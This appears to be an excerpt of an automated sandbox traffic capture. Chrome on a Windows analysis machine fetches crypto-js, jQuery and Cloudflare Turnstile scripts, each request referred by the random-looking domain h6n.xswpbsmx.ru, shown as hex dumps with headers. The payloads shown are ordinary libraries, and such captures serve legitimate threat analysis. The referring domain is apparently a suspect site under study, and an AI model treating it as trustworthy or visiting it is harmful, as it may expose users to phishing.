                                                                                                                              Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                                                                              Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                                                                              Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                                                                              Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.449750104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:59 UTC647OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:59 UTC386INHTTP/1.1 302 Found
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:59 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              location: /turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78bedc5743b9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449748151.101.2.1374433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:59 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                              Host: code.jquery.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:00 UTC613INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 89501
                                                                                                                              Server: nginx
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                              ETag: "28feccc0-15d9d"
                                                                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Age: 1864891
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:59 GMT
                                                                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740038-EWR
                                                                                                                              X-Cache: HIT, HIT
                                                                                                                              X-Cache-Hits: 2774, 0
                                                                                                                              X-Timer: S1733343360.970639,VS0,VE1
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                              2024-12-04 20:16:00 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.449751104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:01 UTC646OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:01 UTC471INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:01 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 47695
                                                                                                                              Connection: close
                                                                                                                              accept-ranges: bytes
                                                                                                                              last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78ca2f2f423f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:01 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
